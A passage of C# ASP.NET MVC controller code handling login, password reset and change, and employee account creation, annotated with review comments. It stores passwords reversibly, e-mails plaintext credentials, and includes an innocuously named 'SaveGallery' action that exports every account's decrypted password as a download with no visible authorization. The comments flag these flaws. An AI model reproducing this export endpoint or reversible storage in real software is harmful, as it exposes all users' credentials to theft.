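        /// <summary>
        /// Completes the forced first-login password reset for the current user and signs the
        /// session out so the new credential must be used to log in again.
        /// </summary>
        /// <param name="_passwordInfo">Posted form model carrying the new password.</param>
        /// <returns>
        /// The reset view (with a message in <c>TempData["Msg"]</c>) when validation or a business
        /// rule fails, a redirect to the profile page when the account is not in first-login state,
        /// or a redirect to the login page after a successful reset.
        /// </returns>
        public ActionResult ResetPassword(ResetNewPasswordViewModel _passwordInfo)
        {
            try
            {
                if (!ModelState.IsValid)
                {
                    return View();
                }

                AuthenticatedUser _authUser;

                using (AuthRepository Repo = new AuthRepository())
                {
                    _authUser = Repo.GetAuthenticatedUserById(CurrentUser.EmployeeInfoId);
                }

                // Guard against an unknown id: previously a null result surfaced as a
                // NullReferenceException that was caught below and shown to the user.
                if (_authUser == null)
                {
                    TempData["Msg"] = AlertMessageProvider.FailureMessage("Account not found.");

                    return View();
                }

                if (_authUser.IsFirstTimeLogin == false)
                {
                    return RedirectToAction("GeneralInfo", "Profile");
                }

                // NOTE(review): passwords are stored reversibly (RijndaelCrypt.DecryptPassword recovers
                // the plaintext) instead of as a one-way salted hash. Changing that is a storage/schema
                // migration outside this method; the comparison is kept as-is until then.
                if (RijndaelCrypt.DecryptPassword(_authUser.PasswordHash, _authUser.Salt) == _passwordInfo.NewPassword)
                {
                    TempData["Msg"] = AlertMessageProvider.FailureMessage("New password should not be same as current password.");

                    return View();
                }

                // A fresh salt is generated for every password change.
                var _accountInfo = new AccountInfo();
                _accountInfo.Id               = CurrentUser.AccountId;
                _accountInfo.Salt             = RandomPassword.Generate(18, 20);
                _accountInfo.PasswordHash     = RijndaelCrypt.EncryptPassword(_passwordInfo.NewPassword, _accountInfo.Salt);
                _accountInfo.IsFirstTimeLogin = false;

                using (AccountRepository Repo = new AccountRepository())
                {
                    Repo.ChangeNewPassword(_accountInfo);
                }

                // Invalidate the current authentication cookie so the next request needs the new password.
                var ctx = Request.GetOwinContext();
                ctx.Authentication.SignOut("ApplicationCookie");

                // Use the shared message provider (as the failure paths above do) instead of an inline span.
                TempData["Msg"] = AlertMessageProvider.SuccessMessage("Password has been reset successfully.");
                return RedirectToAction("Login", "Auth", new { area = "" });
            }
            catch (Exception ex)
            {
                // Do not echo ex.ToString() (exception type, message and stack trace) to the browser;
                // show a generic message and leave the details to server-side logging.
                TempData["Msg"] = AlertMessageProvider.FailureMessage("Something went wrong! Password could not be reset, please try again later.");

                return View();
            }
        }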
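        /// <summary>
        /// Changes the current user's password after verifying the current one.
        /// </summary>
        /// <param name="passwordInfo">Posted form model with the current and the new password.</param>
        /// <returns>
        /// The change-password view with a success or failure message in <c>TempData["Msg"]</c>,
        /// or the shared "Error" view when an unexpected exception occurs.
        /// </returns>
        public ActionResult ChangePassword(ChangePasswordViewModel passwordInfo)
        {
            try
            {
                if (!ModelState.IsValid)
                {
                    return View();
                }

                // Declared without a throw-away instance: the repository result replaces it anyway.
                AccountInfo _account;

                using (AccountRepository Repo = new AccountRepository())
                {
                    _account = Repo.GetEmployeeAccountById(CurrentUser.AccountId);
                }

                // Previously a null result became a NullReferenceException on the decrypt call below.
                if (_account == null)
                {
                    TempData["Msg"] = AlertMessageProvider.FailureMessage("Account not found.");

                    return View();
                }

                // NOTE(review): the stored credential is reversible (decrypted here for comparison)
                // rather than a one-way salted hash; migrating the storage is outside this method.
                string decryptedPassword = RijndaelCrypt.DecryptPassword(_account.PasswordHash, _account.Salt);

                if (decryptedPassword != passwordInfo.CurrentPassword)
                {
                    TempData["Msg"] = AlertMessageProvider.FailureMessage("Current password is invalid.");

                    return View();
                }

                if (decryptedPassword == passwordInfo.NewPassword)
                {
                    TempData["Msg"] = AlertMessageProvider.FailureMessage("New password should not be same as current password.");

                    return View();
                }

                // A fresh salt is generated for every password change.
                _account.Salt         = RandomPassword.Generate(18, 20);
                _account.PasswordHash = RijndaelCrypt.EncryptPassword(passwordInfo.NewPassword, _account.Salt);

                using (AccountRepository Repo = new AccountRepository())
                {
                    Repo.ChangeNewPassword(_account);
                }

                TempData["Msg"] = AlertMessageProvider.SuccessMessage("Password changed successfully.");

                return View();
            }
            catch (Exception ex)
            {
                return View("Error", new HandleErrorInfo(ex, "Auth", "ChangePassword"));
            }
        }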
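        /// <summary>
        /// Builds a plain-text report of every account (company e-mail, recovered plaintext password,
        /// role) and returns it as a downloadable <c>saved_data.txt</c>.
        /// </summary>
        /// <remarks>
        /// NOTE(review): this action writes every account's plaintext password into a file that is
        /// handed to the browser — effectively a credential export. It relies on the credentials being
        /// stored reversibly (RijndaelCrypt.DecryptPassword). No <c>[Authorize]</c> attribute is visible
        /// on this method in the listing; confirm access is restricted, and strongly consider removing
        /// the password line (or the whole action) rather than keeping a bulk plaintext-password export.
        /// </remarks>
        /// <returns>A <c>text/plain</c> file result containing one block per account.</returns>
        public FileStreamResult SaveGallery()
        {
            // StringBuilder replaces repeated string concatenation; the produced text is identical.
            var report = new StringBuilder();

            using (AccountRepository Repo = new AccountRepository())
            {
                foreach (var item in Repo.GetAccounts())
                {
                    report.Append(item.CompanyEmail).Append(Environment.NewLine);
                    report.Append(RijndaelCrypt.DecryptPassword(item.PasswordHash, item.Salt)).Append(Environment.NewLine);
                    report.Append(item.RoleName).Append(Environment.NewLine)
                          .Append("---------").Append(Environment.NewLine).Append(Environment.NewLine);
                }
            }

            // UTF-8 instead of ASCII: ASCII silently replaced any non-ASCII character in e-mails,
            // passwords or role names with '?', corrupting the exported data.
            var byteArray = Encoding.UTF8.GetBytes(report.ToString());
            var stream    = new MemoryStream(byteArray);

            // The FileStreamResult takes ownership of the stream and disposes it after writing the response.
            return File(stream, "text/plain", "saved_data.txt");
        }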
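        /// <summary>
        /// Authenticates a user by company e-mail and password, records the login, issues the OWIN
        /// "ApplicationCookie" identity and redirects according to the account's onboarding state.
        /// </summary>
        /// <param name="loginInfo">Posted login form (company e-mail, password, optional return URL).</param>
        /// <returns>
        /// The login view with a message in <c>TempData["Msg"]</c> when validation fails, the
        /// credentials do not match or the account is inactive; otherwise a redirect to the password
        /// reset, the personal-info step or the role-specific landing page.
        /// </returns>
        public ActionResult Login(LoginViewModel loginInfo)
        {
            try
            {
                if (!ModelState.IsValid)
                {
                    return View();
                }

                // Culture-invariant lower-casing: ToLower() depends on the thread culture (e.g. the
                // Turkish dotless-i rules) and could produce a key that no longer matches the stored e-mail.
                loginInfo.CompanyEmail = loginInfo.CompanyEmail.ToLowerInvariant();
                AuthenticatedUser _authUser;

                using (AuthRepository Repo = new AuthRepository())
                {
                    _authUser = Repo.IsAccountExist(loginInfo);
                }

                // One generic message for both "unknown account" and "wrong password" so the response
                // does not reveal which e-mails exist. NOTE(review): the stored credential is reversible
                // (decrypted for comparison) rather than a one-way salted hash; migrating the storage is
                // outside this method.
                if (_authUser == null || RijndaelCrypt.DecryptPassword(_authUser.PasswordHash, _authUser.Salt) != loginInfo.Password)
                {
                    TempData["Msg"] = "<span style='color:red; text-align:center;'>Invalid Username/Password.</span>";

                    return View();
                }

                if (_authUser.IsActive != true)
                {
                    TempData["Msg"] = "<span style='color:red; text-align:center;'>Your account is deactive, you can't access online services.</span>";
                    return View();
                }

                using (AccountRepository Repo = new AccountRepository())
                {
                    var _userAccount = new AccountInfo();

                    _userAccount.Id            = _authUser.AccountId;
                    _userAccount.LastLoginIp   = Request.UserHostAddress;
                    // Local server time, matching how the rest of the controller stamps dates.
                    _userAccount.LastLoginDate = DateTime.Now;

                    Repo.UpdateAccountOnLogin(_userAccount);
                }

                string _mode = _authUser.Role == "SuperAdmin" ? "Admin" : "Employee";

                // NOTE(review): Claim's constructor throws ArgumentNullException for a null value, so a
                // null LastLoginIp/CompanyEmail/Role would end in the catch block — confirm the repository
                // never returns nulls for these fields.
                var _identity = new ClaimsIdentity(new[] {
                    new Claim(ClaimTypes.Name, _authUser.FirstName + " " + _authUser.LastName),
                    new Claim(ClaimTypes.Email, _authUser.CompanyEmail),
                    new Claim(ClaimTypes.Role, _authUser.Role),
                    new Claim(ClaimTypes.NameIdentifier, _authUser.AccountId.ToString()),
                    new Claim("EmployeeInfoId", _authUser.EmployeeInfoId.ToString()),
                    new Claim("LastLoginDate", _authUser.LastLoginDate.ToString()),
                    new Claim("LastLoginIp", _authUser.LastLoginIp),
                    new Claim("Mode", _mode)
                }, "ApplicationCookie");

                var ctx = Request.GetOwinContext();

                // Non-persistent, sliding 30-minute cookie.
                ctx.Authentication.SignIn(new AuthenticationProperties()
                {
                    ExpiresUtc   = DateTime.UtcNow.AddMinutes(30),
                    AllowRefresh = true,
                    IsPersistent = false
                }, _identity);

                if (_authUser.IsCheckListCompleted == false)
                {
                    if (_authUser.IsFirstTimeLogin == true)
                    {
                        return RedirectToAction("ResetPassword", "Account", new { Area = "EmployeeReg" });
                    }

                    return RedirectToAction("PersonalInfo", "Profile", new { Area = "EmployeeReg" });
                }

                return Redirect(GetRedirectUrl(loginInfo.ReturnUrl, _authUser.Role));
            }
            catch (Exception ex)
            {
                // Do not echo ex.Message to the browser; show a generic message and leave the details
                // to server-side logging.
                TempData["Msg"] = "<span style='color:red; text-align:center;'>Something went wrong, please try again later.</span>";
                return View();
            }
        }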
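        /// <summary>
        /// Creates an employee account with a generated initial password, seeds the related
        /// check-list, employee, leave, salary and family-member rows in one transaction, and e-mails
        /// the credentials to the new employee.
        /// </summary>
        /// <param name="accountInfo">Posted account form; password, salt, role and status fields are filled in here.</param>
        /// <returns>
        /// The create view when the model is invalid or the e-mail is already taken, a redirect to
        /// the account list (with a message in <c>TempData["Msg"]</c>) after creation, or the shared
        /// "Error" view on an unexpected exception.
        /// </returns>
        public ActionResult Create(AccountInfo accountInfo)
        {
            try
            {
                if (ModelState.IsValid)
                {
                    var _employeeInfo = new Model.EmployeeInfo();
                    _employeeInfo.CreatedByAccountId = CurrentUser.AccountId;
                    _employeeInfo.CreatedDate        = DateTime.Now;

                    int employeeInfoId;
                    int accountId;

                    // Keep the generated plaintext in a local so the e-mail below can use it directly
                    // instead of decrypting the stored value again. NOTE(review): the stored credential is
                    // reversible (RijndaelCrypt) rather than a one-way salted hash; migrating the storage
                    // is outside this method.
                    string saltValue         = RandomPassword.Generate(18, 20);
                    string generatedPassword = RandomPassword.Generate();
                    string password          = RijndaelCrypt.EncryptPassword(generatedPassword, saltValue);

                    // Culture-invariant lower-casing so the stored key matches the login lookup regardless
                    // of the server's thread culture.
                    accountInfo.CompanyEmail     = accountInfo.CompanyEmail.ToLowerInvariant();
                    accountInfo.PasswordHash     = password;
                    accountInfo.Salt             = saltValue;
                    // NOTE(review): a "last login" stamp is set before the user has ever logged in; confirm
                    // downstream code does not treat this as a real login.
                    accountInfo.LastLoginDate    = DateTime.Now;
                    accountInfo.LastLoginIp      = "";
                    accountInfo.IsActive         = true;
                    accountInfo.IsFirstTimeLogin = true;

                    // Everything below is rolled back if Complete() is not reached (including the early
                    // return on a duplicate e-mail, which happens before anything is written).
                    using (var transaction = new System.Transactions.TransactionScope())
                    {
                        using (AccountRepository Repo = new AccountRepository())
                        {
                            if (Repo.IsEmailExist(accountInfo.CompanyEmail) == true)
                            {
                                TempData["Msg"] = AlertMessageProvider.FailureMessage("Email already exist.");

                                return View();
                            }

                            accountInfo.RoleId = Repo.GetRoleIdByName("Anonymous");

                            accountId = Repo.CreateAccount(accountInfo);
                        }

                        using (AccountCheckListRepository Repo = new AccountCheckListRepository())
                        {
                            Repo.SaveAccountCheckList(new AccountCheckListInfo(accountId));
                        }

                        using (EmployeeRepository Repo = new EmployeeRepository())
                        {
                            _employeeInfo.AccountId = accountId;

                            employeeInfoId = Repo.SaveEmployeeInfo(_employeeInfo);
                        }

                        using (LeaveAllowedRepository Repo = new LeaveAllowedRepository())
                        {
                            Repo.SaveLeaveAllowed(new LeaveAllowedInfo(0, 0, employeeInfoId, CurrentUser.AccountId));
                        }

                        using (SalaryRepository Repo = new SalaryRepository())
                        {
                            Repo.SaveSalary(new SalaryInfo(CurrentUser.AccountId, employeeInfoId));
                        }

                        using (FamilyMemberRepository Repo = new FamilyMemberRepository())
                        {
                            // NOTE(review): "Selef" looks like a typo for "Self", but existing rows may hold
                            // this value; change it together with any code that matches on it.
                            var _familyMember = new FamilyMemberInfo
                            {
                                Name           = "Self",
                                Relation       = "Selef",
                                EmployeeInfoId = employeeInfoId
                            };

                            Repo.SaveFamilyMember(_familyMember);
                        }

                        transaction.Complete();
                    }

                    var    recipients = new List<string> { accountInfo.CompanyEmail };
                    string subject    = "LPS Online Account Information";
                    var    loginUrl   = Url.Action("Login", "Auth", new { Area = "" }, protocol: Request.Url.Scheme);

                    // The e-mail address is model-bound input placed inside an HTML body, so it is encoded.
                    // NOTE(review): mailing a plaintext password is inherently risky; a one-time
                    // set-password link would avoid putting the credential in the mailbox at all.
                    string body = "Dear Employee, <br/><br/>" +
                                  "Your account has been created.<br/>" +
                                  "Please ensure to save the username and password written below:<br/><br/>" +
                                  "Username: &nbsp; <b>" + System.Net.WebUtility.HtmlEncode(accountInfo.CompanyEmail) + "</b><br/>" +
                                  "Password: &nbsp; <b>" + System.Net.WebUtility.HtmlEncode(generatedPassword) + "</b><br/><br/>" +
                                  "<a href='" + loginUrl + "' target='_blank'>" + loginUrl + "</a><br/>" +
                                  "You can login to your account to use LPS online services.<br/><br/>" +
                                  "Thanks,<br/>" +
                                  "<b>Logic Powered Solutions</b>";

                    bool sent = EmailSender.Send(subject, body, recipients);

                    TempData["Msg"] = sent
                        ? AlertMessageProvider.SuccessMessage("Account created, email has been sent to employee successfully.")
                        : AlertMessageProvider.FailureMessage("Something went wrong! email not sent, please try again later.");

                    return RedirectToAction("Manage", "Account");
                }

                return View();
            }
            catch (Exception ex)
            {
                return View("Error", new HandleErrorInfo(ex, "Account", "Create"));
            }
        }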
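        /// <summary>
        /// Re-sends the account-information e-mail (username and initial password) to an employee
        /// who has not yet completed onboarding.
        /// </summary>
        /// <param name="id">Account id to look up.</param>
        /// <returns>
        /// A redirect to the account list with a success or failure message in <c>TempData["Msg"]</c>,
        /// or the shared "Error" view on an unexpected exception.
        /// </returns>
        public ActionResult ResendEmail(int id)
        {
            try
            {
                AccountInfo _accountInfo;

                using (AccountRepository Repo = new AccountRepository())
                {
                    _accountInfo = Repo.GetAccountByid(id);
                }

                if (_accountInfo == null)
                {
                    TempData["Msg"] = AlertMessageProvider.FailureMessage("Something went wrong! email not sent, please try again later.");

                    return RedirectToAction("Manage", "Account");
                }

                if (_accountInfo.IsCheckListCompleted == true)
                {
                    TempData["Msg"] = AlertMessageProvider.FailureMessage("This account has been already activated.");

                    return RedirectToAction("Manage", "Account");
                }

                // Once the employee has reset the generated password (IsFirstTimeLogin cleared), the
                // stored credential is their own chosen password. The check-list check alone did not
                // cover that window, so the user's own password would have been recovered and e-mailed.
                if (_accountInfo.IsFirstTimeLogin == false)
                {
                    TempData["Msg"] = AlertMessageProvider.FailureMessage("The initial password has already been changed by the employee, email not sent.");

                    return RedirectToAction("Manage", "Account");
                }

                var    recipients = new List<string> { _accountInfo.CompanyEmail };
                string subject    = "LPS Online Account Information";
                var    loginUrl   = Url.Action("Login", "Auth", new { Area = "" }, protocol: Request.Url.Scheme);

                // NOTE(review): this relies on the stored credential being reversible
                // (RijndaelCrypt.DecryptPassword) and mails the plaintext; a one-time set-password link
                // would avoid both. Values are HTML-encoded because they are placed in an HTML body.
                string body = "Dear Employee, <br/><br/>" +
                              "Your account has been created.<br/>" +
                              "Please ensure to save the username and password written below:<br/><br/>" +
                              "Username: &nbsp; <b>" + System.Net.WebUtility.HtmlEncode(_accountInfo.CompanyEmail) + "</b><br/>" +
                              "Password: &nbsp; <b>" + System.Net.WebUtility.HtmlEncode(RijndaelCrypt.DecryptPassword(_accountInfo.PasswordHash, _accountInfo.Salt)) + "</b><br/><br/>" +
                              "<a href='" + loginUrl + "' target='_blank'>" + loginUrl + "</a><br/>" +
                              "You can login to your account to use LPS online services.<br/><br/>" +
                              "Thanks,<br/>" +
                              "<b>Logic Powered Solutions</b>";

                bool sent = EmailSender.Send(subject, body, recipients);

                TempData["Msg"] = sent
                    ? AlertMessageProvider.SuccessMessage("Email has been sent to employee successfully.")
                    : AlertMessageProvider.FailureMessage("Something went wrong! email not sent, please try again later.");

                // Same target as the early returns above (explicit controller name for consistency).
                return RedirectToAction("Manage", "Account");
            }
            catch (Exception ex)
            {
                return View("Error", new HandleErrorInfo(ex, "Account", "ResendEmail"));
            }
        }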